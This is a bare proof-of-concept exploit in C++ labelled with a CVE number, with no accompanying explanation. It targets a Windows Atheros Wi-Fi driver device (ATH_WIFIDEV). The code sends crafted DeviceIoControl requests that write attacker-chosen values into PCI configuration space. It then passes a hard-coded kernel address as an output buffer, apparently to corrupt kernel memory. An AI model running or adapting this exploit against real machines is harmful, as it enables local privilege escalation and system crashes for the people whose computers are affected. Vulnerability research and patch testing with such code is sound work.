CVE-2019–10567

#include <tchar.h>
#include <windows.h>
#include <iostream>

#define IOCTL_GET_PCI_CONFIG 0x220043
#define IOCTL_SET_PCI_CONFIG 0xc3502406

int main()
{
    TCHAR DeviceName[]=_T("\\\\.\\ATH_WIFIDEV.00");
    auto hDevice = CreateFile(DeviceName,GENERIC_READ|GENERIC_WRITE,nullptr,nullptr,OPEN_EXISTING,0,nullptr);
    if(hDevice==INVALID_HANDLE_VALUE)
    {
        return -1;
    }
    DWORD dwRet=0;
    int32_t out_buffer_[0x1000]={};
    int32_t set_data_[0x1000]={
        0xC,// vtable offset to NdisMSetData
        0,
        0x14,//PCI offset
        0x4,//Data Size To Write
        0xCCCCCCCC,//Data To Write
        0xCCCCCCCC//Data To Write
    };
    int32_t get_data_[0x1000]={
        0x14,//pci offset
    };

    DeviceIoControl(hDevice,IOCTL_SET_PCI_CONFIG,set_data_,0x70,out_buffer_,0x54,&dwRet,nullptr);
    DeviceIoControl(hDevice,IOCTL_GET_PCI_CONFIG,get_data_,0x70,(void *)0xffffbe8868000000,0x0,&dwRet,nullptr);

    CloseHandle(hDevice);
    hDevice = 0;
}